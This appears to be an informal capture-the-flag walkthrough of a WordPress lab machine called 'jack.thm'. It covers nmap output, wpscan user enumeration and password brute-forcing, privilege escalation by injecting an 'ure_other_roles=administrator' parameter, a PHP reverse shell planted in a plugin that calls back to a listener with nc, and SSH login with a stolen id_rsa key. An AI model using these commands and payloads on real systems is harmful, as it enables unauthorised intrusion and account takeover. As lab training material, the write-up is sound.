Nmap Results →

Nmap scan report for jack.thm (10.10.216.42)
Host is up (0.048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
|   256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_  256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/16%OT=22%CT=1%CU=39072%PV=Y%DS=2%DC=T%G=Y%TM=5F105C9
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So lets add jack.thm to our /etc/hosts and check the site out and you can dirbust if you want but here we see in the nmap scan that in http-robots.txt we see wp_admin so this means its a wordpress site so lets do a wpscan

wpscan -e u,ap -url jack.thm

and we can get the list of usernames lets add this to a list called user.txt and then using wpscan password bruteforcing we try to get user credentials with the rockyou.txt

wpscan -U user.txt -P /usr/share/wordlists/rockyou.txt --url jack.thm

we find credentials after a longg timee and they are wendy:changelater

and for priv esc we cant just upload a reverse shell because we are not privellaged enough so when we look ar the hints for user it says (ure_other_roles) so lets look for exploits with that and all we had to was go to profile and turn burp on and intercept the request and update the bio so when we see it in our burp proxy we can add this statement at the end and we will get admin privellages.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/abff9f78-fc38-49d7-a70a-5a3f9d37600b/Untitled.png

here at the end

&ure_other_roles=administrator

and now that we have our admin privellages lets add our revershe shell to our plugins you can add it to any i added it to the first one and it was at the top of the code

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f") ?>

and then we go to installed plugins and activate this plugin while listening on netcat and we will get a www-data shell back where lets import pty and then lets go to /home/jack and we can cat out user.txt and reminder.txt and in reminder.txt we get mentioned a backup folder lets locate it

locate backups

and then lets cd /var/backups and then there is a id_rsa key which lets copy and bring over to our machine and then chmod 600 key and then try to login as jack with that key

ssh -i key jack@<ip>